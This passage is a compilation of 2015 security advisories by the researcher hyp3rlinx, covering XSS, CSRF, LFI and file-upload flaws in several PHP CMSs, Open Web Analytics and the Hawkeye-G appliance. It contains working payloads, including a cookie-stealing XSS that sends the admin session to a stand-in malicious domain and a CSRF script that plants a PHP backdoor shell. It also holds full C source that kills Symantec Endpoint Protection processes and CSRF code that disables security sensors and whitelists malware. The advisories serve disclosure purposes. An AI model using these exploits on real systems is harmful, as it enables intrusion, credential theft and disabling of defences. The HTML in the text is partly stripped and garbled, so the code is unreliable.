and prohibits any malicious use of all security related information or exploits by the author or elsewhere. (hyp3rlinx)
GeniXCMS XSS Vulnerabilities
[+] Credits: John Page ( hyp3rlinx ) [+] Domains: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/AS-GENIXCMS0621.txt Vendor: = genixcms.org Product: = GeniXCMS v0.0.3 is a PHP based content management system Advisory Information: === Multiple persistent & reflected XSS vulnerabilities Vulnerability Details: = GeniXCMS v0.0.3 is vulnerable to persistent and reflected XSS XSS Exploit code(s): Persistent XSS: --- http://localhost/GeniXCMS-master/GeniXCMS-master/gxadmin/index.php?page=posts&act=add&token= 1-content input field content injected XSS will execute after posting is published 2-title input field title injected XSS will execute immediate. Relected XSS: - http://localhost/GeniXCMS-master/GeniXCMS-master/gxadmin/index.php?page=posts&q=1'alert('XSS By Hyp3rlinx') Disclosure Timeline: = Vendor Notification: NA June 21, 2015 : Public Disclosure Severity Level: = Med Description: = Request Method(s): [+] GET & POST Vulnerable Product:[+] GeniXCMS 0.0.3 Vulnerable Parameter(s): [+] q, content & title Affected Area(s): [+] index.php === [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. (hyp3rlinx)
novius-os.5.0.1 Persistent XSS, LFI & Open Redirect Vulnerabilities
[+] Credits: John Page ( hyp3rlinx ) [+] Domains: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/AS-NOVIUSOS0629.txt Vendor: === community.novius-os.org Product: === novius-os.5.0.1-elche is a PHP Based Content Management System community.novius-os.org/developpers/download.html Advisory Information: === Persistent XSS, LFI & Open Redirect Vulnerability Details: == Persistent XSS: --- Users can inject XSS payloads that will be saved to MySQL DB, where they will execute each time when accessed. 1- In Admin under 'Media Center' users can inject XSS payloads and save to the 'media_title' field for a saved media file, create a new media page inject payload click save and then select visualize. 2- Under Website menus area users can inject XSS payloads and save for the 'menu_title' field for a Website menu. If we view browser source code at http://localhost/novius-os.5.0.1-elche/novius-os/?_preview the XSS is output to its HTML entities. e.g. But within the same webpage for tag you can see it is not. e.g. alert('HELL') Local File Inclusion: - We can directory traverse access and read files outside of the current working directory in the Admin area by abusing the 'tab' parameter. http://localhost/novius-os.5.0.1-elche/novius-os/admin/?tab=../../../../ Open Redirect: -- http://localhost/novius-os.5.0.1-elche/novius-os/admin/nos/login?redirect= is open to abuse by supplying an malicious a location or file. XSS Exploit code(s): In 'Media Center' create a new media file, click edit and inject XSS payload for the 'title' field click save and then select visualize. http://localhost/novius-os.5.0.1-elche/novius-os/admin/?tab=admin/noviusos_media/media/insert_update/1 vulnerable parameter: media_title In 'Website Menu' create a new website menu item and inject XSS payload click save and then select visualize. http://localhost/novius-os.5.0.1-elche/novius-os/admin/?tab=admin/noviusos_menu/menu/crud/insert_update%3Fcontext%3Dmain%253A%253Aen_GB http://localhost/novius-os.5.0.1-elche/novius-os/?_preview=1 vulnerable parameter: menu_title LFI: http://localhost/novius-os.5.0.1-elche/novius-os/admin/?tab=../../../SENSITIVE-FILE.txt http://localhost/novius-os.5.0.1-elche/novius-os/admin/?tab=../../../../xampp/phpinfo.php Open Redirect: -- http://localhost/novius-os.5.0.1-elche/novius-os/admin/nos/login?redirect=http://www.SATANSBRONZEBABYSHOES.com Disclosure Timeline: == Vendor Notification: NA June 29, 2015 : Public Disclosure Severity Level: = Med Description: Request Method(s): [+] GET & POST Vulnerable Product:[+] novius-os.5.0.1-elche Vulnerable Parameter(s): [+] media_title, menu_title, tab, redirect Affected Area(s): [+] Login, Web Pages, Media Center & Website Menu area = [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. (hyp3rlinx)
phpLiteAdmin v1.1 CSRF & XSS Vulnerabilities
[+] Credits: John Page ( hyp3rlinx ) [+] Domains: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/AS-PHPLITEADMIN0705.txt Vendor: bitbucket.org/phpliteadmin Product: phpLiteAdmin v1.1 Advisory Information: CSRF & XSS Vulnerabilities Vulnerability Details: == CSRF: -- No CSRF token exists when making calls to various SQL operations therefore we can get user to drop the whole database tables if they click on our malicious link and table is known. XSS: -- There are three XSS vulnerabilities I point out first is use of 'PHP_SELF', second is unsanitized parameter for SQL statement when calling drop table method e.g. 'http://localhost/phpliteadmin.php?droptable=[XSS]' and third is an unsanitized 'table' parameter e.g. 'http://localhost/phpliteadmin_v1-1/phpliteadmin.php?table=[XSS]' Lets look at the first one more in depth as its more fun. phpliteadmin uses a PHP reserved server variable $_SERVER['PHP_SELF'] which is vulnerable if not used correctly allowing us to inject an XSS payload to steal session cookies and navigate them to a place of our choosing in order to cause mayhem. On line 32 of 'phpliteadmin.php' we find vulnerable code: //build the basename of this file $nameArr = explode("?", $_SERVER['PHP_SELF']); $thisName = $nameArr[0]; $nameArr = explode("/", $thisName); $thisName = $nameArr[sizeof($nameArr)-1]; //constants define("VERSION", "1.1"); define("PAGE", $thisName); --- In PHP docs we find the following explanation of 'PHP_SELF': "The filename of the currently executing script, relative to the document root." ref: http://php.net/manual/en/reserved.variables.server.php It is known $_SERVER['PHP_SELF'] can make your application insecure as we can inject code following a forward slash "/" But we have slight problem to overcome, we can execute code but our forward slashes will not be processed correctly and exploit will FAIL! leaving us with the following useless URL instead of taking the victim to a domain of our choice. Fail exploit example: http://localhost/phpliteadmin_v1-1/phpliteadmin.php/";'onMouseOver="window.open('http://hyp3rlinx.altervista.org')" Failed Result: http://localhost/phpliteadmin_v1-1/phpliteadmin.php/hyp3rlinx.altervista.org But all is NOT lost!, we will construct our malicious URL forward slashes in our JS call to window.open() method using String.charCodeAt(58) for ':' and String.charCodeAt(47) for '/' which will NOW give us what we seek, control over the users browser taking them to some terrible dark place. Bypass $_SERVER['PHP_SELF'] forward slash '//' processing issue: Tada!, our successful XSS exploit: http://localhost/phpliteadmin_v1-1/phpliteadmin.php/";'onMouseOver="(function(){var x='http';x+=String.fromCharCode(58)+String.fromCharCode(47)+String.fromCharCode(47)+'hyp3rlinx.altervista.org';window.open(x);})()" Exploit code(s): === XSS(s) POC: -- 1- $_SERVER['PHP_SELF'] XSS exploit steals current admin session cookie and sends to remote server: http://localhost/phpliteadmin_v1-1/phpliteadmin.php/";'onMouseOver="(function(){var x='http';x+=String.fromCharCode(58)+String.fromCharCode(47)+String.fromCharCode(47)+'MALICIOUS-DOMAIN';window.open(x+String.fromCharCode(47)+'cookietheft.php'+String.fromCharCode(63)+'='+document.cookie);})()" 2- SQL droptable XSS: http://localhost/sectest/phpliteadmin_v1-1/phpliteadmin.php?droptable=alert(666) 3- SQL table XSS: http://localhost/phpliteadmin_v1-1/phpliteadmin.php?table="/>alert(666) CSRF POC: - Drop tables: localhost/phpliteadmin_v1-1/phpliteadmin.php?droptable=mytable&confirm=1 Disclosure Timeline: = Vendor Notification: NA July 5, 2015 : Public Disclosure Severity Level: = Med Description: == Request Method(s): [+] GET Vulnerable Product: [+] phpliteadmin_v1-1 Vulnerable Parameter(s):[+] $_SERVER['PHP_SELF'], droptable, table Affected Area(s): [+] Admin === [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. (hyp3rlinx)
Symantec EP 12.1.4013 Disabling Vulnerability
#include #include #define SMC_EXE "Smc.exe" #define SMC_GUI "SmcGui.exe" #define CC_SVC_HST "ccSvcHst.exe" /* By John Page (hyp3rlinx) - Dec 2014 - hyp3rlinx.altervista.org Symantec Endpoint Protection version 12.1.4013 First reported to Symantec - Jan 20, 2015 Goal: Kill Symantec EP agent & services after globally locking down endpoint protection via the Symantec central management server and enabling globally managed password protection controls. Tested successfully on Windows 7 SP1 result may vary OS to OS. Scenario: Run the from browser upon download or save to some directory and run Not the most elegant code and I don't care... */ void el_crookedio_crosso(const char *victimo){ HANDLE hSnapShot=CreateToolhelp32Snapshot(TH32CS_SNAPALL,0); PROCESSENTRY32 pEntry; pEntry.dwSize=sizeof(pEntry); BOOL hRes=Process32First(hSnapShot,&pEntry); while(hRes){ if(strcmp(pEntry.szExeFile,victimo)==0){ HANDLE hProcess=OpenProcess(PROCESS_TERMINATE,0,(DWORD)pEntry.th32ProcessID); if (hProcess!=NULL){ TerminateProcess(hProcess,9); CloseHandle(hProcess); } } hRes=Process32Next(hSnapShot,&pEntry); } CloseHandle(hSnapShot); } DWORD exeo_de_pid(char *ghostofsin){ DWORD ret=0; PROCESSENTRY32 pe32={sizeof (PROCESSENTRY32)}; HANDLE hProcSnap=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0); if (hProcSnap==INVALID_HANDLE_VALUE) return 0; if (Process32First (hProcSnap,&pe32)) do if (!strcmp(pe32.szExeFile,ghostofsin)) { ret=pe32.th32ProcessID; break; } while (Process32Next (hProcSnap,&pe32)); CloseHandle (hProcSnap); return ret; } void angelo_maliciouso(){ int AV=exeo_de_pid(SMC_EXE); char id[8]; sprintf(id, "%d ", AV); printf("%s", id); char cmd[50]="Taskkill /F /PID "; strcat(cmd, id); system(cmd); // system("Taskkill /F /IM Smc.exe"); //Access denied. system("\"C:\\Program Files (x86)\\Symantec\\Symantec Endpoint Protection\\Smc.exe\" -disable -ntp"); Sleep(1000); el_crookedio_crosso(SMC_EXE); el_crookedio_crosso(SMC_GUI); el_crookedio_crosso(CC_SVC_HST); } int main(void){ puts("/*---*/\n"); puts("| EXORCIST DE SYMANTEC Antivirus version 12.1.4013|\n"); puts("| By hyp3rlinx - Jan 2015|\n"); puts("/**/\n"); SetDebugPrivileges(); angelo_maliciouso(); Sleep(1000); el_crookedio_crosso(SMC_EXE); el_crookedio_crosso(SMC_GUI); el_crookedio_crosso(CC_SVC_HST); Sleep(2000); angelo_maliciouso(); Sleep(6000); return 0; } int SetDebugPrivileges(){ DWORD err=0; TOKEN_PRIVILEGES Debug_Privileges; if(!LookupPrivilegeValue(NULL,SE_DEBUG_NAME,&Debug_Privileges.Privileges[0].Luid))return GetLastError(); HANDLE hToken=0; if(!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES,&hToken)){ err=GetLastError(); if(hToken)CloseHandle(hToken); return err; } Debug_Privileges.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED; Debug_Privileges.PrivilegeCount=1; if(!AdjustTokenPrivileges(hToken,FALSE,&Debug_Privileges,0,NULL,NULL)){ err=GetLastError(); if(hToken) CloseHandle(hToken); } return err; }
phpSQLiteCMS CSRF, Unrestricted File Type Upload, Privilege Escalation & XSS CSRF, Unrestricted File Type Upload, Privilege Escalation & XSS
[+] Credits: John Page ( hyp3rlinx ) [+] Domains: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/AS-PHPSQLITECMS0712.txt Vendor: phpsqlitecms.net Product: ilosuna-phpsqlitecms-d9b8219 Advisory Information: == CSRF, Unrestricted File type upload, Privilege escalation & XSS Vulnerabilities. User will be affected if they visit a malicious website or click any infected link. Possibly resulting in malicious attackers taking control of the Admin / CMS area. Vulnerability Details: = CSRF: - We can add arbitrary users to the system, delete arbitrary web server files and escalate privileges, as no CSRF token is present. Add arbitrary user: --- The following request variables are all that is needed to add users to system. mode = users new_user_submitted = true name = "hyp3rlinx" pw = "12345" pw_r = "12345" Privilege escalation: - Under users area in admin we can easily gain admin privileges, again using CSRF vulnerability we submit form using our id and change request variable to type '1' granting us admin privileges. e.g. mode:users edit_user_submitted:true id:3 name:hyp3rlinx new_pw: new_pw_r: type:1 <--make us admin Delete arbitrary files: The following request parameters are all we is need to delete files from media or files directorys under the web servers CMS area. mode=filemanager directory=files delete=index.html confirmed=true XSS: - We can steal PHP session cookie via XSS vulnerability Unrestricted File Type Upload: -- The files & media dirs will happily take .PHP, .EXE etc... and PHP scripts when selected will execute whatever PHP script we upload. Exploit code(s): === 1- CSRF POC Add arbitrary users to the system. - function doit(){ var e=document.getElementById('evil') e.submit() } http://localhost/ilosuna-phpsqlitecms-d9b8219/ilosuna-phpsqlitecms-d9b8219/cms/index.php"; method="post"> 2- CSRF privilege escalation POST URL: -- http://localhost/ilosuna-phpsqlitecms-d9b8219/ilosuna-phpsqlitecms-d9b8219/cms/index.php Privilege escalation request string: mode=users&edit_user_submitted=true&id=3&name=hyp3rlinx&new_pw=&new_pw_r=&type=1 3- CSRF Delete Aribitary Server Files: -- Below request URL will delete the index.html file in files dir on web server without any type of request validation CSRF token etc. http://localhost/ilosuna-phpsqlitecms-d9b8219/ilosuna-phpsqlitecms-d9b8219/cms/index.php?mode=filemanager &directory=files&delete=index.html&confirmed=true XSS steal PHP session ID POC: - http://localhost/ilosuna-phpsqlitecms-d9b8219/ilosuna-phpsqlitecms-d9b8219/cms/index.php?mode=comments&type=0&; edit=49&comment_id="/>alert('XSS by hyp3rlinx '%2bdocument.cookie)&page=1 Disclosure Timeline: = Vendor Notification: NA July 12, 2015 : Public Disclosure Severity Level: = High Description: == Request Method(s): [+] POST & GET Vulnerable Product: [+] ilosuna-phpsqlitecms-d9b8219 Vulnerable Parameter(s): [+] comment_id, delete, type, new_user_submitted Affected Area(s): [+] Admin & CMS === [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. (hyp3rlinx)
Open-Web-Analytics-1.5.7 Cryptographic, Password Disclosure & XSS Vulnerabilities
[+] Credits: John Page ( hyp3rlinx ) [+] Domains: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/AS-OPENWEBANALYTICS0721.txt Vendor: www.openwebanalytics.com Product: Open-Web-Analytics-1.5.7 Advisory Information: === Cryptographic, Password Disclosure & XSS Vulnerabilities Vulnerability Details: = Cryptographic Weakness: --- Passwords are stored in the database using MD5 hash algorithm NON salted, we find in owa_lib.php, public static function encryptPassword($password) { return md5(strtolower($password).strlen($password)); } Password Disclosure: In owa_auth.php on line 329 we find saveCredentials() PHP function which saves the username & password as browser domain cookie leaving us direct access via XSS attack. function saveCredentials() { $this->e->debug('saving user credentials to cookies'); setcookie($this->config['ns'].'u', $this->u->get('user_id'), time()+3600*24*365*10, '/', $this->config['cookie_domain']); setcookie($this->config['ns'].'p', $this->u->get('password'), time()+3600*24*30, '/', $this->config['cookie_domain']); } XSS: Application is vulnerable to XSS So, now we can access the Admin username & password credentials from our XSS attack, do a window.open() or whatever and send to a remote server then come back and login after performing offline crack of the hash. Since we cannot seem to echo the password using document.cookie we will use window.document['cookie'] to gain access to admin password. The application uses the admin username and password as persistant browser cookies which is our dream come true! e.g. retrieved username & passwd via XSS ( owa_u=admin; owa_p=76ffbb8d470d6a402b3c429f35be8a1a ) user: admin / passwd: abc123 Also a second XSS vector exists in Install PHP script via POST request in the Email address field. Exploit code(s): XSS(s) POC: 1- Steal username & password XSS, in this example we inject our malicious payload into the middle of the site ID hash. http://localhost/Open-Web-Analytics-1.5.7/Open-Web-Analytics-1.5.7/index.php?owa_do=base.sitesInvocation&owa_siteId=e9144cf4%22/%3E%22--%3E%3CDIV%20id=%27HELL%27%20onMouseMove=alert%28window.document[%27cookie%27]%29;%3C!-- Injecting
Hawkeye-G v3.0.1.4912 CSRF Vulnerability CVE-2015-2878
[+] Credits: John Page ( hyp3rlinx ) [+] Domains: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/AS-HAWKEYEG0724.txt Vulnerability Type: === CSRF CVE Reference: == CVE-2015-2878 Vendor: === www.hexiscyber.com Product: = Hawkeye-G v3.0.1.4912 Hawkeye G is an active defense disruptive technology that detects, investigates, remediates and removes cyber threats within the network. Advisory Information: Multiple CSRF(s) Vulnerabilities: Vulnerability Details: = 1- CSRF Add arbitrary accounts to system vulnerable URL: https://localhost:8443/interface/rest/accounts/json vulnerable POST parameter: 'name' 2- CSRF modification of network sensor settings - a) Turn off 'Url matching' Sensor b) Turn off 'DNS Inject' Sensor c) Turn off 'IP Redirect' Sensor vulnerable URL: https://localhost:8443/interface/rest/dpi/setEnabled/1 vulnerable POST parameters: 'url_match' 'dns_inject' 'ip_redirect' 3- CSRF whitelisting of malware MD5 hash IDs -- vulnerable URL: https://localhost:8443/interface/rest/md5-threats/whitelist vulnerable POST parameter 'id' CSRF Exploit code(s): /* Execute consecutive CSRF exploits */ function ghostofsin(){ var doc=document; var e1=doc.getElementById('exploit_1') e1.submit() var e2=doc.getElementById('exploit_2') e2.submit() var e3=doc.getElementById('exploit_3') e3.submit() var e4=doc.getElementById('exploit_4') e4.submit() } https://localhost:8443/interface/rest/accounts/json"; method="post"> https://localhost:8443/interface/rest/dpi/setEnabled/1"; method="post"> https://localhost:8443/interface/rest/dpi/setEnabled/1"; method="post"> https://localhost:8443/interface/rest/dpi/setEnabled/1"; method="post"> Whitelist MD5 malware IDs CSRF: --- In final CSRF POC to try an white list malware MD5 IDs will be a bit more complex, we need to submit form many times hidden in background using iframe so we stay on same page. Seems all MD5 ID's end in 0001 and are 8 bytes in length, we just need a loop an create some numbers 8 bytes long and dynamically assign the 'id' value of the field and execute multiple POST requests in background, it will be hit or miss unless you know ahead of time the MD5 ID in the database your targeting. e.g. Malware MD5 database ID 28240001 So Here we go!... http://www.w3.org/TR/html4/loose.dtd";> CSRF POC hyp3rlinx https://localhost:8443/interface/rest/md5-threats/whitelist"; target="demonica" method="post"> var doc=document var x=1000 function exorcism(){ x++ x=x+001 x=String(x) var f=doc.getElementById('hell') var e=doc.getElementById('id') e.value=x f.submit() } setInterval("exorcism()",100) Disclosure Timeline: = Vendor Notification: June 30, 2015 July 24, 2015 : Public Disclosure Severity Level: = High Description: == Request Method(s): [+] POST Vulnerable Product: [+] Hawkeye-G v3.0.1.4912 Vulnerable Parameter(s):[+] name, enable, id Affected Area(s): [+] Network Threat Appliance, Local Domain [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. (hyp3rlinx)
Hawkeye-G v3 CSRF Vulnerability ***[UPDATED CORRECTED]
***[UPDATED CORRECTION] *** [+] Credits: John Page ( hyp3rlinx ) [+] Domains: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/AS-HAWKEYEG0724.txt Vulnerability Type: === CSRF CVE Reference: == CVE-2015-2878 Vendor: === www.hexiscyber.com Product: = Hawkeye-G v3.0.1.4912 Hawkeye G is an active defense disruptive technology that detects, investigates, remediates and removes cyber threats within the network. Advisory Information: Multiple CSRF(s) Vulnerabilities: Vulnerability Details: = 1- CSRF Add arbitrary accounts to system vulnerable URL: https://localhost:8443/interface/rest/accounts/json vulnerable POST parameter: 'name' 2- CSRF modification of network sensor settings - a) Turn off 'Url matching' Sensor b) Turn off 'DNS Inject' Sensor c) Turn off 'IP Redirect' Sensor vulnerable URL: https://localhost:8443/interface/rest/dpi/setEnabled/1 vulnerable POST parameters: 'url_match' 'dns_inject' 'ip_redirect' 3- CSRF whitelisting of malware MD5 hash IDs -- vulnerable URL: https://localhost:8443/interface/rest/md5-threats/whitelist vulnerable POST parameter 'id' CSRF Exploit code(s): /* Execute consecutive CSRF exploits */ function ghostofsin(){ var doc=document; var e1=doc.getElementById('exploit_1') e1.submit() var e2=doc.getElementById('exploit_2') e2.submit() var e3=doc.getElementById('exploit_3') e3.submit() var e4=doc.getElementById('exploit_4') e4.submit() } https://localhost:8443/interface/rest/accounts/json"; method="post"> https://localhost:8443/interface/rest/dpi/setEnabled/1"; method="post"> https://localhost:8443/interface/rest/dpi/setEnabled/1"; method="post"> https://localhost:8443/interface/rest/dpi/setEnabled/1"; method="post"> Whitelist MD5 malware IDs CSRF: --- In final CSRF POC to try an white list malware MD5 IDs will be a bit more complex, we need to submit form many times hidden in background using iframe so we stay on same page. Seems all MD5 ID's end in 0001 and are 8 bytes in length, we just need a loop an create some numbers 8 bytes long and dynamically assign the 'id' value of the field and execute multiple POST requests in background, it will be hit or miss unless you know ahead of time the MD5 ID in the database your targeting. e.g. Malware MD5 database ID 28240001 So Here we go!... http://www.w3.org/TR/html4/loose.dtd";> CSRF POC hyp3rlinx https://localhost:8443/interface/rest/md5-threats/whitelist"; target="demonica" method="post"> var doc=document var x=1000 exorcism() function exorcism(){ x++ String(x) x+="0001" var f=doc.getElementById('hell') var e=doc.getElementById('id') e.value=x x=x.substr(0,4) f.submit() } setInterval("exorcism()",100) Disclosure Timeline: = Vendor Notification: June 30, 2015 July 24, 2015 : Public Disclosure Severity Level: = High Description: == Request Method(s): [+] POST Vulnerable Product: [+] Hawkeye-G v3.0.1.4912 Vulnerable Parameter(s):[+] name, enable, id Affected Area(s): [+] Network Threat Appliance, Local Domain [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. (hyp3rlinx)
Hawkeye-G v3.0.1 Persistent XSS & Information Leakage
[+] Credits: John Page ( hyp3rlinx ) [+] Domains: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/AS-HAWKEYEG0725.txt Vendor: www.hexiscyber.com Product: Hawkeye-G v3.0.1.4912 Hawkeye G is an active defense disruptive technology that detects, investigates, remediates and removes cyber threats within the network. Vulnerability Type: = Persistent XSS & Server Information Leakage CVE Reference: == N/A Advisory Information: = Persistent XSS: --- Hexis cyber Hawkeye-G network threat appliance is vulnerable to persistent XSS injection when adding device accounts to the system. The appliance contains an endpoint sensor that collects client information to report back to the Hawkeye-G web interface. When adding device accounts to the system XSS payloads supplied to the vulnerable id parameter 'name' will be stored in database and executed each time certain threat appliance webpages are visited. Server Information Disclosure: - We can force internal server 500 errors that leak back end information's. Stack traces are echoed out to the end user instead of being suppressed this can give attackers valuable information into the system internals possibly helping attackers in crafting more specific types of attacks. Exploit code(s): === Persistent XSS: --- https://localhost:8443/interface/rest/accounts/json"; method="post"> Accessing URL will execute malicious XSS stored in Hawkeye-G backend database. https://localhost:8443/interface/app/#/account-management vulnerable parameter: 'name' Server Information Leakage: --- These examples will result in 500 internal server error info disclosures: 1- https://localhost:8443/interface/rest/threatfeeds/pagedJson?namePattern=&page=0&size=25&sortCol=address&sortDir=%22/%3E%3Cscript%3Ealert%280%29%3C/script%3E 2- https://localhost:8443/interface/rest/mitigationWhitelist/paged?namePattern=WEB-INF/web.xml&page=0&size=0&source-filter= Disclosure Timeline: = Vendor Notification: June 30, 2015 July 25, 2015 : Public Disclosure Severity Level: = High Description: == Request Method(s):[+] POST & GET Vulnerable Product: [+] Hawkeye-G v3.0.1.4912 Vulnerable Parameter(s): [+] name, namePattern, sortDir Affected Area(s): [+] Network Threat Appliance === [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. by hyp3rlinx
phpFileManager 0.9.8 CSRF Backdoor Shell Vulnerability
[+] Credits: John Page ( hyp3rlinx ) [+] Domains: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/AS-PHPFILEMANAGER0729.txt Vendor: phpfm.sourceforge.net Product: phpFileManager version 0.9.8 Vulnerability Type: == CSRF Remote Backdoor Shell CVE Reference: == N/A Advisory Information: CSRF Remote Backdoor Shell Vulnerability Vulnerability Details: === PHP File Manager is vulnerable to creation of arbitrary files on server via CSRF which we can use to create remote backdoor shell access if victim clicks our malicious linx or visits our malicious webpages. To create backdoor shell we will need to execute two POST requests 1- to create PHP backdoor shell 666.php 2- inject code and save to the backdoor we just created e.g. https://localhost/phpFileManager-0.9.8/666.php?cmd=[ OS command ] Exploit code(s): === var scripto="frame=3&action=2&dir_dest=2&chmod_arg=&cmd_arg=666.php¤t_dir=&selected_dir_list=&selected_file_list=" blasphemer(scripto) var maliciouso="action=7&save_file=1¤t_dir=.&filename=666.php&file_data='" blasphemer(maliciouso) function blasphemer(payload){ var xhr=new XMLHttpRequest() xhr.open('POST',"https://localhost/phpFileManager-0.9.8/index.php";, true) xhr.setRequestHeader("content-type", "application/x-www-form-urlencoded") xhr.send(payload) } Disclosure Timeline: = Vendor Notification: July 28, 2015 July 29, 2015 : Public Disclosure Severity Level: = High Description: == Request Method(s): [+] POST Vulnerable Product: [+] phpFileManager 0.9.8 Vulnerable Parameter(s):[+] action, cmd_arg, file_data, chmod_arg, save_file Affected Area(s): [+] Web Server === [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. by hyp3rlinx
PHPfileNavigator 2.3.3 Persistent & Reflected XSS
[+] Credits: John Page aka hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/AS-PHPFILENAVIGATOR0812c.txt Vendor: pfn.sourceforge.net Product: === PHPfileNavigator v2.3.3 (pfn) Is state-of-the-art, open source web based application to complete manage your files and folders. Vulnerability Type: = Persistent & Reflected XSS CVE Reference: == N/A Vulnerability Details: = Multiple persistent XSS vulnerable fields exist on the 'Modify User' form. nome, usuario, email etc... We can leverage existing CSRF vulnerability to update a victimz profile and store malicious XSS payload or an malicious user can inject there own payloads when updating thier profilez affecting other users and the security of the whole application. Multiple reflected XSS exists as well for following PHP pages all with same vulnerable parameter 'dir' when issuing GET requests. pfn-2.3.3 application seems to filter out tags etc, but we can bypass this usinghttp://localhost/PHPfileNavigator/pfn-2.3.3/xestion/usuarios/index.php?PHPSESSID= e.g. Inject